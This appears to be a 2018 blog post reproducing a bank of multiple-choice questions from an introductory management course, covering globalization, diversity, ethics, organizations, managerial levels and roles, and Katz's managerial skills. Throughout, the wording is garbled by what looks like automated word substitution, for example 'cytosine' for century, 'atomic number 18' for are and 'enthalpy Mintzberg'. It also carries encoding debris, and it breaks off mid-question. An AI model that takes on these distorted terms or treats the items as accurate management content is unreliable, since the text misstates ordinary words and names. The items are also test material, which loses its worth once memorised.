Sunday, December 16, 2018
'Multiple Choice Questions Essay\r'
'1.The dynamic brand- cutting turnplace of the twenty-first cytosine is characterized by: 1. A lastly rivalrous world(a) economic governance, driven by innovation and technology, that has created both peculiar opport unit of measurementies and unprecedented un trustedties.\r\n2. Smart state and smart disposals creating their take futures. 3. Companies with a future sharing an cardinal committedness to populate 4. alone of the in a higher place.\r\n5. n ace of the above.\r\n2.The best employers character each(prenominal) of the pursuance characteristics leave off:\r\n6. They commence lofty per throwance expected apprises.\r\n7. They provide employees with both valued rewards and repute for mold-life balance. 8. They argon extremely right at attracting and retaining capable employees. 9. They excel at fully utilizing employeesââ¬â¢ talents and valuing their contri saveions. 10. They excel at exploiting the natural surround.\r\n3.__________ ar achieve mentful beca practise they atomic number 18 reform than their competitors at gaining extraordinary results from the people give outs for them.\r\n11. Ameri throw out companies.\r\n12. Japanese companies.\r\n13. High technology companies.\r\n14. High playing companies.\r\n15. Companies that embrace diversity.\r\n4.__________ introduces you to the concepts, themes, and directions that be consonant with c atomic number 18r success and organisational leadinghip in todayââ¬â¢s lavishly surgical procedure lick habilitatetings.\r\n16. The study of hands diversity.\r\n17. The study of centering.\r\n18. The study of the global deliverance.\r\n19. The study of s exceedping point fashioning.\r\n20. The study of great leading.\r\n5.The study of __________ should enable you to correspond as much as possible to fake for a c beer-long commitment to getting great things hale-mannered finished buy the farmal with people\r\n21. Management.\r\n22. The global economy.\r\n 23. ending making.\r\n24. Great leadership.\r\n25. randomness technology.\r\n6.Which report does NOT accurately characterize the nature of the recent economy?\r\n26. It is an economy rich with challenging opportunities.\r\n27. It is a net multifariousness by reversaled economy in which the Internet increasingly influences people, institutions, and nations. 28. It is a net acted economy where people and institutions moreover non nations atomic number 18 influenced by go on burst out awayments in experience technology. 29. It is an economy full of prominent un currentties.\r\n30. It is the economy in which people now suffer and naturalize.\r\n7.Which of the adjacent attributes accurately describes the bleakly economy?\r\n31. The new economy is a global economy.\r\n32. The new economy is knowledge-driven.\r\n33. The new economy is proceeding-driven.\r\n34. All of these are attributes of the new economy.\r\n35. Only alternate(a)s A and C describe attributes of the new economy.\r\n8.The ultimate derriere of shapingal surgical run is __________.\r\n36. The avail might and amount of financial chief city.\r\n37. The fruition of character reference heartfelts or the provision of quality services. 38. What people know, what people learn, and what people do with it. 39. Computer-based technology.\r\n40. Inspirational and transmogrifyational leadership.\r\n9.__________ is the collective brainpower or get byd knowledge of a workforce that muckle be personad to create value.\r\n41. passenger vehicleial expertise.\r\n42. smart capital.\r\n43. A training giving medication.\r\n44. friendship focussing.\r\n45. managerial competency.\r\n10.Someone whose disposition is a critical asset to employers and who adds to the intellectual capital of the boldness is a(n) __________.\r\n46. Administrator.\r\n47. Top-level film director.\r\n48. serviceable managing director.\r\n49. Information competent carriage.\r\n50. Knowledge worker.\r\nG lobalization\r\n11.__________ is the worldwide interdependence of resource flows, product markets, and business competition that characterizes the new economy.\r\n51. stinting internationalization.\r\n52. multinational counselling.\r\n53. Globalization.\r\n54. World interdependence.\r\n55. Cross-cultural business.\r\n12.Which of the future(a) statements accurately describes the opposition of the global economy?\r\n56. The world is increasingly set up in regional economic blocks. 57. Government leaders in our global economy are bear on to the mellowest degree the competitiveness of nations. 58. The national boundaries of business are disappearing.\r\n59. All of the above.\r\n60. none of the above.\r\n13.In a(n) __________, countries and peoples are increasingly unified with respect to labor markets and business handings.\r\n61. Ethical world.\r\n62. Globalized world.\r\n63. ethnocentric world.\r\n64. Socially responsible world.\r\n65. Ethnically diverse world.\r\nengineerin g\r\n14.__________ and __________ befriend cheeks of all types and sizes, locally and internationally, to speed legal proceeding and improve decision making.\r\n66. The United Nations ü computers.\r\n67. The United States segment of Commerce üthe World Trade Organization. 68. Computers ü schooling technology.\r\n69. Information technology ü a diverse workforce.\r\n70. Globalization ü morality.\r\n15.Which of the succeeding(a) statements does NOT describe an implication of technology for the new economy?\r\n71. Technology is an indispensable business office of customary worldly concern presentations in all types of businesses. 72. The lessons of e-business are creation applied to e-government. 73. In virtual space, people in remote locations can hold run acrosss, share information and files, strike plans, and solve problems in concert. 74. The demand for knowledge workers with the skills to habituate technology to full advantage is increasing. 75. Work go out still be the same even with computers and high technology.\r\n16.Several technological trends are occurring in the new economy. Which of the spare-time activity is NOT one of these trends?\r\n76. The Internet, World Wide Web, computers, and information technology have transformed and comprehend to transform the modern oeuvre. 77. The demand for knowledge workers with the skills to utilize technology to full advantage is increasing. 78. Computer competency moldinessiness be get the hang and continuously take aimed as a foundation for biography success. 79. Low-skill workers who are displaced from declining industries leave asshole non need to re-tool their skills to find adequate alternative employment. 80. The rate of technological change testament continue to accelerate.\r\nDiversity\r\n17.When a high societyââ¬â¢s coach-and-fourial account might complicates supporting employment opportunities and upward mobility for women, minorities, wound somebodys and people between the ages of 50 and 70, the accompevery is __________.\r\n81. Providing good functional conditions for employees.\r\n82. Practicing respectable behavior.\r\n83. Valuing workforce diversity.\r\n84. Operating fit to the Civil Rights Act.\r\n85. Promoting distinguishableial treatment for some people.\r\n18.Differences among members of the workforceââ¬Ã¢â¬ much(prenominal) as age, gender and national ocellusââ¬Ã¢â¬are characteristics of __________.\r\n86. organisational gaps.\r\n87. Workforce diversity.\r\n88. Cultural similarities.\r\n89. Economic barriers for workforce goment.\r\n90. Management challenges.\r\n19.Displaying negative, irrational opinions and attitudes toward members of diverse populations is considered to be __________.\r\n91. Unholy.\r\n92. An injustice.\r\n93. Illegal.\r\n94. Prejudice.\r\n95. Holding power inwardly your own hands.\r\n20.Treating certain people un comelyly and denying them the full benefits of organisational rank is calle d __________.\r\n96. Prejudice.\r\n97. Discrimination.\r\n98. The glass ceiling effect.\r\n99. Poor quality of work life.\r\n100. Selective valet de chambre resource management.\r\n21.The existence of an undetectable barrier that prevents women and minorities from rising above a certain level of organizational debt instrument is called the __________.\r\n101. Harassment effect.\r\n102. sparkler ceiling effect.\r\n103. Mirrored wall effect.\r\n104. Promotion barrier.\r\n105. pasty floor effect.\r\nEthics\r\n22.Which of the pursuit are purloin targets for ethical and social business issues?\r\n106. Concerns for the natural surround.\r\n107. Employeesââ¬â¢ behavior.\r\n108. ever-changing ask of an increasingly global economy.\r\n109. All of the above.\r\n110. no(prenominal) of the above.\r\n23.A well-know business executive goes to jail for non revealing a item-by-item(prenominal)ised financial invade in a project that go out significantly benefit company realizes . This executiveââ¬â¢s litigate is an example of __________.\r\n111. Providing high company profits.\r\n112. Maximizing personal objectives.\r\n113. Ignoring music directorial ethics.\r\n114. Adhering to division policies.\r\n115. Performing autocratic leadership.\r\n24.In the twenty-first century, organizations and their members will encounter all of the pursuance ethical prognosiss EXCEPT:\r\n116. The vista of treating customers right and acting in slipway consistent with societyââ¬â¢s values. 117. The expectation of standable development and protection of the natural surroundings. 118. The expectation of protecting consumers through and through product safety and fair practices. 119. The expectation of protecting human rights, including employment policies and practices. 120. The expectation that stockholdersââ¬â¢ interests should be the primary consideration when organizations make decisions poignant the environment.\r\n25.All but one of the following wor k pressures involving ethics and social state toward human capital will affect organizations and their members in the future. Identify the pressure that will NOT affect organizations and their members.\r\n121. Job security.\r\n122. Occupational safety and health.\r\n123. Equal employment opportunities.\r\n124. Employeesââ¬â¢ demands for less self-determination and greater supervisory oversight. 125. Equity of compensation and benefits.\r\nCareers\r\n26.According to British assimilator Charles Handy, __________ describe the career implications of changing employment patterns in organizations.\r\n126. Full-time workers, part-time workers, and temporary workers. 127. Contract workers, full-time workers, and core employees. 128. Core workers, contract workers, and part-time workers.\r\n129. dexterous workers, un hot laborers, and contract workers. 130. technological employees, unskilled laborers, and skilled workers.\r\n27.According to Charles Handy, a __________ is a person who pursues career paths with a traditional character.\r\n131. Temporary skilled worker.\r\n132. Contract worker.\r\n133. part-time worker.\r\n134. Core worker.\r\n135. Service worker.\r\n28.In Charles Handyââ¬â¢s comment of changing careers, a person who performs specific ruminates as essential and is compensated on a fee-for-services introduction is a __________.\r\n136. Service worker.\r\n137. Holiday worker.\r\n138. Contract worker.\r\n139. accredited worker.\r\n140. Part-time worker.\r\n29.The natural career in the 21st century __________.\r\n141. Wonââ¬â¢t be uniformly full-time and limited to a mavin organization. 142. result require skills to be portable and of value to to a greater extent than one employer. 143. Will require skills to be carefully maintained and upgraded over time. 144. All of the above.\r\n145. None of the above.\r\nORGANIZATIONS IN THE NEW WORKPLACE\r\n30.Which of the following statements does NOT accurately describe organizations in the new workplace?\r\n146. Organizations in the new workplace are tied to connectivity make possible by information technology. 147. Organizations in the new workplace are challenging poses as well as being exciting for their great opportunities and possibilities. 148. Organizations in the new workplace should make real and authoritative voices to society. 149. Organizations are the principal source of careers and peopleââ¬â¢s economic livelihood. 150. Organizations in the new workplace destress working for somebody or something.\r\n31.Which of the following is not one of the critical survival skills for the new workplace that is identified in the school text?\r\n151. Entrepreneurship.\r\n152. Love of technology.\r\n153. Marketing.\r\n154. Finance.\r\n155. furore for renewal.\r\n32.To survive in the new workplace, people must do all of the following EXCEPT:\r\n156. Be able to contribute something of value to their employers. 157. Have tie in with peers and others inside and outside the organization in society to get things done. 158. Be able to communicate personal and work group successes and growth. 159. Act as if they are running their own businesses.\r\n160. Have an extensive knowledge of computer languages and their applications.\r\nWhat Is an Organization?\r\n33.An organization is a __________.\r\n161. A solicitation of people working competitively to hightail it out the mission. 162. A collection of people working together to achieve a common purpose. 163. A collection of people accountable to a single theater director. 164. A collection of people working in different departments. 165. A collection of people working together in a business.\r\n34.A clear brain of purpose that is tied to __________ is increasingly viewed as a source of organizational strength and carrying out advantage.\r\n166. qualification a profit and providing a high apply to stockholders. 167. Producing quality products and providing customer gratification. 168. Producing go ods and services for worldwide consumption. 169. do the highest return on investment and having the greatest profit great power. 170. Expanding through mergers and acquisitions.\r\n35.Belief in a strong and compelling organizational purpose is an important reason for __________.\r\n171. Employees earning a good salary.\r\n172. Manipulating employee perceptions.\r\n173. Employees remaining very loyal to their employers.\r\n174. Hiring family members of current employees.\r\n175. free employees favorable trans pull through evaluations.\r\nOrganizations as Systems\r\n36.Organizations are agreements comprise of __________.\r\n176. A collection of subsystems, each working for reprint determinations. 177. Sets of organizational policies and playes.\r\n178. Interdependent parts that function together to achieve a common purpose. 179. A collection of independent job tasks.\r\n180. Independent subsystems that interact with their environment.\r\n37.Which of the following accurately d escribes an adequate to(p) system?\r\n181. An open system is permissive in observing the rules of management science. 182. An open system is a collection of subsystems that do not relate to one another. 183. An open system is consistent with the Theory Y system of management. 184. An open system interacts with the external environment in a constant process of transforming resource inputs into product outputs in the form of finished goods and/or services. 185. An open system treats its employees as responsible adults.\r\n38.Which of the following statements accurately describes the open systems mannikin of organizations?\r\n186. The environment provides resource inputs including finished goods and/or services. 187. The organization creates a transformation process for turning resources into outputs. 188. The environment consumes product outputs including people, money, materials, technology, and information. 189. Resource inputs affect product outputs through a feedback loop. 190. Workflows are part of the resource inputs.\r\n39.Which statement(s) regarding an organizationââ¬â¢s environment is/are true(p)?\r\n191. The environment is a critical element of the open systems model. 192. The environment is a supplier of resources and a source of customers. 193. Feedback from the environment tells an organization how well it is doing. 194. All of these are true statements regarding an organizationââ¬â¢s environment. 195. All of these are fictional statements regarding an organizationââ¬â¢s environment.\r\nOrganizational capital punishment\r\n40.The operation through which an organization can add value to the original cost of resource inputs while the organization earns a profit is called __________.\r\n196. The systems and operations channel.\r\n197. The transmission process.\r\n198. take account creation.\r\n199. Production and operations management.\r\n200. The marketing channel.\r\n41.__________ refers to the quantity and quality of work motion, w ith resource utilization taken into account.\r\n201. Effectiveness.\r\n202. Efficiency.\r\n203. Profitability.\r\n204. Productivity.\r\n205. asset management.\r\n42.An output measure of task or finis consummation is called __________.\r\n206. Performance efficiency.\r\n207. Productivity.\r\n208. The bottom term.\r\n209. Performance hard-hittingness.\r\n210. Organizational competency.\r\n43.Which of the following statements does NOT accurately describe the jolt of resource utilization and tendency attainment on organizational performance?\r\n211. When resource utilization is lamentable and purpose attainment is low, organizational performance is neither effective nor efficient. 212. When resource utilization is good and goal attainment is low, organizational performance is efficient but not effective. 213. When resource utilization is misfortunate and goal attainment is high, organizational performance is effective but not efficient. 214. When resource utilization good and goal attainment is high, organizational performance is both effective and efficient. 215. Organizational performance is unaffected by poor versus good resource utilization and low versus high goal attainment.\r\n44.A manager who emphasizes cost containment, even at the expense of missing production targets, is more interested in __________ than in __________.\r\n216. Performance efficiency ü performance effectiveness.\r\n217. Performance effectiveness ü performance efficiency.\r\n218. Productivity ü performance efficiency.\r\n219. Productivity ü performance effectiveness.\r\n220. Productivity ü quality of work life.\r\n45.A measure of the resource cost associated with goal accomplishment is called _________.\r\n221. Performance efficiency.\r\n222. Productivity.\r\n223. The bottom creese.\r\n224. Performance effectiveness.\r\n225. Organizational competency.\r\n changing Nature of Organizations\r\n46.Organizations are changing in a chassis of ways. Which of the fol lowing is NOT one of the ways mentioned in the text?\r\n226. Preeminence of technology.\r\n227. Demise of command-and-control.\r\n228. forward-moving brand marketing.\r\n229. Belief in empowerment.\r\n230. Emphasis on squadwork.\r\n47.Organizations are changing in a variety of ways. Which of the following is NOT one of the ways mentioned in the text?\r\n231. New workforce expectations.\r\n232. Focus on speed.\r\n233. Embrace of networking.\r\n234. Focus on profitability.\r\n235. Concern for work-life balance.\r\n48.The forces behind the changes that are occurring in organizations include all of the following EXCEPT:\r\n236. Competition.\r\n237. Diminished skill capacity of the workforce.\r\n238. Globalization.\r\n239. emergent technologies.\r\n240. Customersââ¬â¢ demands for quality products and services.\r\n49.Managing with an organization-wide commitment to continuous improvement and meeting customer needs completely is the concept of __________.\r\n241. well-behaved leader ship.\r\n242. Total quality management.\r\n243. Systems theory.\r\n244. Organizational behavior.\r\n245. Theory Z.\r\nMANAGERS IN THE NEW WORKPLACE\r\nWhat Is a Manager?\r\n50.A manager may be set forth as __________.\r\n246. A person who directly supports and armed services activate the work efforts and performance accomplishments of others. 247. Someone who is unswervingly loyal to the organization.\r\n248. Someone who has mastered the hierarchy of authority.\r\n249. Someone who contends with corporate politics.\r\n250. A person who tries to produce as much output with as slim personal input as possible.\r\n51.Which of the following statements accurately describes managers?\r\n251. Managers are responsible for their own work as well as the overall performance accomplishments of a group, work group, department, or entire organization. 252. Managers help others to achieve high performance.\r\n253. Mangers have the well-nigh indispensable job in society.\r\n254. All of the abov e.\r\n255. None of the above.\r\nLevels and Types of Managers\r\n52.In contemporary society, managers are expected to skilled at doing all of the following EXCEPT:\r\n256. Organizing complex subjects.\r\n257. Solving problems.\r\n258. communicating ideas.\r\n259. Making swift decisions.\r\n260. develop new products.\r\n53.A ranked classification of managers identifies a manager by levels such as __________.\r\n261. Experienced and inexperienced.\r\n262. Headquarters and branch.\r\n263. Top, middle, and team leaders or supervisors.\r\n264. Functional, staff, and lineage.\r\n265. Administrative and general.\r\n54.__________ are responsible for the performance of the organization as a whole or of one of its major parts.\r\n266. Top managers.\r\n267. lay managers.\r\n268. team leaders or supervisors.\r\n269. Functional managers.\r\n270. everyday managers.\r\n55.__________ are in name of intercoursely large departments or divisions consisting of several smaller work units.\r\n271. Top managers.\r\n272. Middle managers.\r\n273. group leaders or supervisors.\r\n274. Functional managers.\r\n275. normal managers.\r\n56.Which statement astir(predicate) middle management is veritable?\r\n276. Middle management includes executives and vice presidents. 277. Middle managers work with peers to help coordinate activities across the organization. 278. Middle managers develop high-level action plans for implementation by persons working below them. 279. Middle managers are functional managers and whence do not have other managers inform to them. 280. Middle managers constitute the first level of an organizationââ¬â¢s hierarchy of authority.\r\n57.A person who coordinates complex projects with task deadlines and does so while working with legion(predicate) persons of different expertise both inside and outside the organization is called a __________.\r\n281. Group supervisor.\r\n282. Staff manager.\r\n283. Team leader.\r\n284. thrust manager.\r\n285. Labor lead er.\r\n58.A __________ is a person who is in charge of a small work group dispassionate of nonmangerial workers.\r\n286. Staff manager.\r\n287. name manager.\r\n288. Team leader.\r\n289. Middle manager.\r\n290. Functional manager.\r\n59.__________ pursue work unit performance objectives that are consistent with high-level organizational goals.\r\n291. Top managers.\r\n292. Middle managers.\r\n293. Team leaders or supervisors.\r\n294. Functional managers.\r\n295. General managers.\r\n60.The responsibilities of team leaders and supervisors include all of the following EXCEPT:\r\n296. Planning meetings and work schedules.\r\n297. Clarifying goals and tasks and gathering ideas for improvement. 298. soften attention to long-run problems and opportunities in the external environment. 299. Recommending pay increases and new assignments.\r\n300. Recruiting, training, and developing team members.\r\n61.The responsibilities of team leaders and supervisors include all of the following EXC EPT:\r\n301. back up high performance and teamwork.\r\n302. Informing team members about organizational goals and expectations. 303. Informing higher levels of team needs and accomplishments. 304. Coordinating with other teams and supporting their work efforts. 305. Developing and implementing action plans for large departments or divisions.\r\n62.Managers who have responsibility for work activities that make a direct contribution to production of the organizationââ¬â¢s product or service are called __________.\r\n306. Middle managers.\r\n307. Staff managers.\r\n308. overseas telegram managers.\r\n309. General managers.\r\n310. Administrators.\r\n63.In a department store, a department supervisor would be considered to be __________.\r\n311. A line manager.\r\n312. A staff manager.\r\n313. A general manager.\r\n314. An administrator.\r\n315. An executive.\r\n64.Managers who use their supererogatory skillful expertise to support the efforts of line workers are called __________ .\r\n316. Line managers.\r\n317. Staff managers.\r\n318. Engineers.\r\n319. General managers.\r\n320. Administrators.\r\n65.__________ managers use their special technical expertise to support the efforts of __________ managers.\r\n321. General ü functional.\r\n322. Administrative ü general.\r\n323. Higher-level ü lower-level.\r\n324. Staff ü line.\r\n325. Line ü staff.\r\n66.A manager who has responsibility for a single bowl of activity in the organization is __________.\r\n326. A staff manager.\r\n327. A line manager.\r\n328. A functional manager.\r\n329. A general manager.\r\n330. An administrator.\r\n67.A manager who is responsible for complex organizational units that include galore(postnominal) functional areas of activity is __________.\r\n331. An administrator.\r\n332. A multifunctional manager.\r\n333. A technocrat.\r\n334. A team captain.\r\n335. A general manager.\r\n68.A plant manager who oversees the purchasing, manufacturing, warehousing, sales, and pe rsonnel functions may be described as __________.\r\n336. A general manager.\r\n337. An administrator.\r\n338. A functional manager.\r\n339. A staff manager.\r\n340. A controller.\r\n69.Managers who work in public or non-profit-making organizations are called __________.\r\n341. Staff managers.\r\n342. Line managers.\r\n343. Functional managers.\r\n344. General managers.\r\n345. Administrators.\r\n70.Which statement concerning managers and administrators is TRUE?\r\n346. Administrators get it on with material resources, while managers deal with human resources. 347. Administrators deal with human resources, while managers deal with material resources. 348. Administrators cannot be managers and managers cannot be administrators. 349. Nonprofit organizations do not have managers; business enterprises do not have administrators. 350. Administrators are managers who work in public or nonprofit organizations.\r\nManagerial Performance\r\n71.The organizational requirement for one person to answer back to a higher authority for performance results in his or her area of work responsibility is know as __________.\r\n351. Productivity.\r\n352. attribute management.\r\n353. Accountability.\r\n354. Hierarchical monitoring.\r\n355. Performance assurance.\r\n72.Truly effective managers utilize organizational resources in ways that result in both __________ and __________.\r\n356. High-performance outcomesââ¬Â¦high levels of satisfaction for the workers. 357. High-performance outcomesââ¬Â¦high returns to the stockholders. 358. High-quality products or servicesââ¬Â¦high returns to the stockholders. 359. High profit marginsââ¬Â¦large market shares.\r\n360. High returns to the stockholdersââ¬Â¦high levels of satisfaction for the workers\r\n73.The overall quality of human experiences in the workplace is known as __________.\r\n361. serviceman conditions analysis.\r\n362. Standards for workplace experiences.\r\n363. pure tone of work life.\r\n364. Total quality man agement.\r\n365. Quality assurance.\r\n74.Which statement about quality of work life (QWL) is mistaken?\r\n366. QWL expresses true respect for people at work.\r\n367. QWL is part of any managerââ¬â¢s accountability.\r\n368. QWL provides for protection of individual rights.\r\n369. QWL deals with human resource utilization in the performance process. 370. QWL changes very little during tough economic times.\r\never-changing Nature of Managerial work\r\n75.High playing managers are good at __________.\r\n371. Building working relationships with others.\r\n372. Creating a work environment that is only performance-driven. 373. Helping others to develop their skills and performance competencies 374. Fostering teamwork.\r\n375. Creating a work environment that fosters both performance and satisfaction.\r\n76.When the operating workers are at the top of the organizationââ¬â¢s decision making process and supported by the managers located at the bottom, the organization is operating with __________.\r\n376. An ineffective management concept.\r\n377. A wrong-sided pyramid.\r\n378. An out-dated organizational chart.\r\n379. An upside down pyramid.\r\n380. An upside-down organizational chart.\r\n77.An upside-down pyramid has several practical implications. Which of the following is/are included among these practical implications?\r\n381. Each individual is a value-added worker who creates eventual value for the organizationââ¬â¢s customers or clients. 382. A managerââ¬â¢s job is to support workersââ¬â¢ efforts to add value to the organizationââ¬â¢s goods or services. 383. The best managers are often known for ââ¬Å"helpingââ¬Â and ââ¬Å"supportingââ¬Â rather than ââ¬Å"directingââ¬Â and ââ¬Å" ordain-giving.ââ¬Â 384. All of the above are practical implications of the upside-down pyramid. 385. None of the above are practical implications of the upside-down pyramid.\r\n78.Managerial work is changing in all of the following ways EXCEPT:\r \n386. The best managers are known more for ââ¬Å"helpingââ¬Â and ââ¬Å"supportingââ¬Â rather than for ââ¬Å"directingââ¬Â and ââ¬Å" put in-giving.ââ¬Â 387. to a greater extent emphasis is placed on teamwork.\r\n388. The title of manager is often replaced with ââ¬Å"coordinator,ââ¬Â ââ¬Å"coach,ââ¬Â or ââ¬Å"team leader.ââ¬Â 389. The role of managers is to help workers serve customer needs. 390. Symbolically, managers remain at the top of the organizational pyramid.\r\nTHE MANAGEMENT PROCESS\r\nFunctions of Management\r\n79.Which of the following statements accurately describes the management process?\r\n391. The management process collects using four functions to mobilize resources in order to perform important tasks and achieve organizational goals. 392. The management process is concerned with the mechanics, but not the results, of managing. 393. The management process is a formal system that removes responsibility for decision making from individual managers. 394. All of the above.\r\n395. None of the above.\r\n80.The four basic functions of management are __________.\r\n396. Delegating, planning, organizing, and order giving.\r\n397. Organizing, leading, controlling, and order giving.\r\n398. Planning, organizing, leading, and controlling.\r\n399. Delegating, leading, controlling, and decision making.\r\n400. Planning, leading, controlling, and decision making.\r\n81.Setting performance objectives and identifying action steps for accomplishing them describes the management function of __________.\r\n401. Planning.\r\n402. Organizing.\r\n403. Leading.\r\n404. Controlling.\r\n405. last making.\r\n82.Suppose that the companyââ¬â¢s president identifies a problem with the companyââ¬â¢s employee turnover rate and consequently decides to develop a policy to increase the companyââ¬â¢s commitment to its employees. The president is practicing the management function of __________.\r\n406. Planning.\r\n407. Organizing.\r\n408 . Leading.\r\n409. Controlling.\r\n410. Decision making.\r\n83.Assigning tasks, allocating resources, and arranging the coordinated activities of individuals and groups to implement plans describes the management function of __________.\r\n411. Planning.\r\n412. Organizing.\r\n413. Leading.\r\n414. Controlling.\r\n415. Delegating.\r\n84.Suppose that a manager sets up a committee to develop procedures for dealing with company-wide training needs and then assigns people to conduct specific training courses. This manager is performing which management function?\r\n416. Planning.\r\n417. Organizing.\r\n418. Motivating.\r\n419. Leading.\r\n420. Controlling.\r\n85.Arousing the enthusiasm of employees to work hard and to direct their efforts toward fulfilling plans and accomplishing objectives describes the management function of __________.\r\n421. Planning.\r\n422. Organizing.\r\n423. Leading.\r\n424. Controlling.\r\n425. fix giving.\r\n86.Suppose a manager starts an affirmative actio n course of instruction to increase opportunities for minority advancement and then communicates the objectives of the program to all employees. By doing this the manager gains their support and participation. This manager is performing which management function?\r\n426. Planning.\r\n427. Organizing.\r\n428. Leading.\r\n429. Motivating.\r\n430. Controlling.\r\n87.Measuring work performance, equivalence results to objectives, and taking corrective action as needed describes the management function of __________.\r\n431. Planning.\r\n432. Organizing.\r\n433. Leading.\r\n434. Controlling.\r\n435. Delegating.\r\n88.When a manager monitors the progress of an affirmative action program to advance minorities within the corporation, reviews progress on changes in employee attitudes, calls a special meeting to discuss problems, and makes appropriate adjustments in the program, the manager is performing the\r\nfunction of __________.\r\n436. Planning.\r\n437. Organizing.\r\n438. Leading.\r\ n439. Controlling.\r\n440. Delegating.\r\nManagerial Activities and Roles\r\n89.According to enthalpy Mintzberg, the typical managerââ¬â¢s day is __________.\r\n441. Slow paced and fill routine work.\r\n442. Unforgiving in intensity and pace.\r\n443. fill up with too much spare time.\r\n444. Straightforward with little uncertainty.\r\n445. Relatively free of pressure.\r\n90.enthalpy Mintzberg identified a set of roles that managers perform. These roles are grouped into which of the following three categories?\r\n446. interpersonal, strategic, and decisional.\r\n447. Strategic, informational, and authoritarian.\r\n448. Interpersonal, informational, and decisional.\r\n449. Supervisory, authoritarian, and decisional.\r\n450. Supervisory, informational, and strategic.\r\n91.According to Henry Minztberg, managerial roles that involve the giving, receiving, and analyzing of information are called __________.\r\n451. Informational roles.\r\n452. Interpersonal roles.\r\n453. Decisional roles.\r\n454. Technical roles.\r\n455. abstract roles.\r\n92.According to Henry Minztberg, managerial roles that involve interactions with people inside and outside the work unit are called __________.\r\n456. Informational roles.\r\n457. Interpersonal roles.\r\n458. Decisional roles.\r\n459. Technical roles.\r\n460. Human roles.\r\n93.According to Henry Minztberg, managerial roles that involve using information to make decisions in order to solve problems or address opportunities are called __________.\r\n461. Informational roles.\r\n462. Interpersonal roles.\r\n463. Decisional roles.\r\n464. Technical roles.\r\n465. Conceptual roles.\r\n94.According to the explore conducted on the nature of managerial work, which of the following is dour?\r\n466. Managers work at fragmented and varied tasks.\r\n467. Managers work at an intense pace.\r\n468. Managers work long hours.\r\n469. Managers draw much time working alone.\r\n470. Managers work with many communication media.\r\nManageri al Agendas and Networks\r\n95.According to John Kotter, two activities are fundamental to a general managerââ¬â¢s success in mastering daily challenges. These two activities are __________.\r\n471. Negotiating and directing.\r\n472. Motivating and controlling.\r\n473. Planning and controlling.\r\n474. Agenda setting and networking.\r\n475. Communicating and leading.\r\n96.When general managers develop action priorities for their jobs that include goals and plans spanning long and short time frames, they are performing the important activity of __________.\r\n476. Agenda setting.\r\n477. Leading.\r\n478. Motivating.\r\n479. Controlling.\r\n480. Information processing.\r\n97.One conclusion of John Kotterââ¬â¢s research on effective general managers is that they must pay attention to the enormousness of __________.\r\n481. Building organization structures that enforce discipline. 482. Motivating workers through incentive pay and reward plans. 483. Developing technical knowledge regarding the tasks at hand. 484. Establishing good interpersonal relationships at work. 485. Serving as a figurehead in office ceremonies.\r\n98.Which of the following statements does NOT provide a correct description of the forces affecting lifelong learning?\r\n486. Workers are expected to become involved, fully participate, attest creativity, and find self-fulfillment in their work. 487. Change is a way of life that demands new individual and organizational responses. 488. Workers are expected to be team players that recognise the needs and goals of the total organization. 489. Only managers must be concerned about the demanding quest for high performance. 490. Workers are expected to use new technologies to their full advantage.\r\n99.__________ is the process of continuously learning from our daily experiences and opportunities.\r\n491. Managerial learning.\r\n492. straight improvement.\r\n493. Lifelong learning.\r\n494. Experienced-based skill development.\r\n495. Competenc y acquisition.\r\nEssential Managerial Skills\r\n100.In management, the ability to translate knowledge into action that results in desired performance is called __________.\r\n496. The managerial challenge.\r\n497. The management process.\r\n498. Performance effectiveness.\r\n499. Performance efficiency.\r\n500. A skill.\r\n101.According to Robert Katz, the essential skills of management can be grouped into three categories. These categories are:\r\n501. Communicative, procedural, and strategic.\r\n502. Communicative, technical, and human.\r\n503. Human, supervisory, and conceptual.\r\n504. Technical, human, and conceptual.\r\n505. Procedural, supervisory, and strategic.\r\n102.The ability to apply a special proficiency or expertise to perform specific tasks is known as __________.\r\n506. A technical skill.\r\n507. A procedural skill.\r\n508. An administrative skill.\r\n509. A conceptual skill.\r\n510. A supervisory skill.\r\n103.A manager who is using spreadsheet software to prepa re a departmental budget is exercising a __________ skill.\r\n511. Supervisory.\r\n512. Conceptual.\r\n513. Creative.\r\n514. Technical.\r\n515. Strategic.\r\n104.__________ skills are most important at lower levels of managerial responsibility.\r\n516. Supervisory.\r\n517. Human.\r\n518. Technical.\r\n519. Administrative.\r\n520. Conceptual.\r\n105.The ability to work well in cooperation with other persons is described as __________.\r\n521. A technical skill.\r\n522. A human skill.\r\n523. A communicative skill.\r\n524. An administrative skill.\r\n525. A conceptual skill.\r\n106.A manager with a high degree of self-awareness and a capacity to understand and empathize with the feelings of others is exhibiting effective __________ skills.\r\n526. Technical.\r\n527. Strategic.\r\n528. Conceptual.\r\n529. Learning.\r\n530. Human.\r\n107.An important component of __________ is the ability to manage ourselves and our relationships effectively, which is also known as __________\r\n531. H uman skills ü emotional intelligence.\r\n532. Human skills ü self-management.\r\n533. Informational roles ü self-management.\r\n534. randy intelligence ü human skills.\r\n535. Emotional intelligence ü synergistic skills.\r\n108.__________ skills remain relatively consistent in wideness across all levels of management.\r\n536. Technical.\r\n537. Human.\r\n538. Diagnostic.\r\n539. Conceptual.\r\n540. Analytical.\r\n109.__________ skills include the ability to break down problems into smaller parts, to see the relationships among the parts, and to recognize the implications of any one problem for others.\r\n541. Strategic.\r\n542. Administrative.\r\n543. Conceptual.\r\n544. Supervisory.\r\n545. Holistic.\r\n110.A management team that is mentation critically and analytically in\r\ndeveloping an organizational strategy for dealing with a highly competitive global environment is using __________ skills.\r\n546. Technical.\r\n547. Strategic.\r\n548. Conceptual.\r\n549. L earning.\r\n550. Human.\r\n111.Which statement concerning the relative importance of technical, human, and conceptual skills at different management levels is TRUE?\r\n551. Their relative importance tends to be about the same at each managerial level. 552. Technical skills are of greatest importance for middle managers. 553. Conceptual skills are most important for top managers.\r\n554. Human skills are of greatest importance for lower-level managers. 555. Technical skills are not needed at all by top managers.\r\n112.A skill-based capability that contributes to high performance in a managerial job is called a __________.\r\n556. Managerial competency.\r\n557. Technical skill.\r\n558. Managerial skill.\r\n559. Learned skill.\r\n560. Success factor.\r\n113.Managerial competencies are implied in which of the following managerial elements?\r\n561. The management processes of planning, organizing, leading, and controlling. 562. The information, interpersonal, and decision-making demands of managerial roles. 563. The managerial activities of agenda setting and networking. 564. All of the above polish managerial\r\ncompetencies.\r\n565. None of the above reflect managerial competencies.\r\n114.Which of the following is NOT among the skills and personal characteristics that the text describes as providing a foundation for continued professional person development and career success?\r\n566. The ability to share ideas and findings clearly in written and oral expression. 567. The ability to work effectively as a team member and team leader. 568. The ability to initiate change in ambiguous situations. 569. The ability to gather and 